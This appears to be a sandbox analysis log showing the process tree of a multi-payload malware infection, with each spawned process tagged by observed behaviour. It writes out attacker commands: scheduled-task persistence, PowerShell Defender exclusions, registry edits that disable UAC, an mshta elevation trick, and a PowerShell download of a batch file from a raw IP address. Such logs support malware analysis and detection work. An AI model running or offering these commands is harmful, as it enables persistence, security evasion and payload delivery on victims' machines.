C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe"C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\BKKFCFBKFCFB" & exit4⤵
- System Location Discovery: System Language Discovery
PID:4924 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:4592
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3364 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:5768
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test26.exe"C:\Users\Admin\AppData\Local\Temp\Files\test26.exe"3⤵
- Executes dropped EXE
PID:4492
-
-
C:\Users\Admin\AppData\Local\Temp\Files\clip.exe"C:\Users\Admin\AppData\Local\Temp\Files\clip.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5508
-
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5304
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe"C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe"3⤵
- Executes dropped EXE
PID:2956
-
-
C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe"C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:216
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe"C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5328 -
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2112
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4724
-
-
C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe"C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3476
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4368 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5232
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2308 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SOCpyMZT5RRL.bat" "5⤵PID:4012
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:2380
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4704
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1864 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yoo8U08jApyH.bat" "7⤵PID:5932
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:6052
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4288
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"8⤵
- Checks computer location settings
PID:1852 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:4764
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\66F5uGiqJAOk.bat" "9⤵PID:3964
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:2280
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5340
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"10⤵PID:6612
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:6760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y1zWGyz3dY2Y.bat" "11⤵PID:7072
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:6268
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6372
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"12⤵PID:2312
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:6612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nji9VoGgO53z.bat" "13⤵PID:6480
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:6240
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1464
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"14⤵PID:4876
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:4300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1uotMJjAf1rr.bat" "15⤵PID:25100
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:46720
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:46816
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"16⤵PID:10328
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:24616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aTrKFTKtFFLY.bat" "17⤵PID:24848
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:24908
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:24988
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"18⤵PID:25460
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:25508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scgvYUqhnL4t.bat" "19⤵PID:10496
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:26052
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:26124
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"20⤵PID:26804
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:26892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S4XNjx3QJkt7.bat" "21⤵PID:27072
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:27192
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:27308
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"22⤵PID:27824
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:27952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q3k6WSWS4tTa.bat" "23⤵PID:28512
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:11172
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11392
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"24⤵PID:12028
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:12120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugCvnfQWROW5.bat" "25⤵PID:12320
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:12452
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12540
-
-
C:\Windows\system32\devtun\RuntimeBroker.exe"C:\Windows\system32\devtun\RuntimeBroker.exe"26⤵PID:13028
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:13160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\djJ6SAoRVT0p.bat" "27⤵PID:13424
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe"C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5516
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe"C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5184 -
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3676
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe"C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL4⤵PID:1424
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
PID:2144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL4⤵PID:4904
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe"3⤵
- Executes dropped EXE
PID:1064 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5604
-
-
C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"4⤵
- Executes dropped EXE
PID:4716 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:6044
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe"C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:1188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1564
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2172 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5932
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4688 -
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5504 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main5⤵PID:7028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe"C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3272
-
-
C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2596
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1864
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe"C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5812
-
-
C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe"C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5604 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 7124⤵
- Program crash
PID:5976
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3028 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9021.tmp\9022.tmp\9023.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"4⤵PID:100
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6052
-
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)5⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
PID:5168 -
C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE"C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5320 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9E3A.tmp\9E3B.tmp\9E3C.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"7⤵PID:5720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:6044
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:5752
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:4680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"8⤵PID:6012
-
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command9⤵PID:4752
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/8⤵PID:5996
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd2b4a46f8,0x7ffd2b4a4708,0x7ffd2b4a47189⤵PID:2560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:29⤵PID:5928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:39⤵PID:32
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2476 /prefetch:89⤵PID:2224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:19⤵PID:4452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:19⤵PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:19⤵PID:7136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:19⤵PID:6492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:19⤵PID:4556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:19⤵PID:6956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:19⤵PID:6972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:89⤵PID:27172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5336 /prefetch:29⤵PID:28408
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net8⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"8⤵
- Command and Scripting Interpreter: PowerShell
PID:1664
-
-
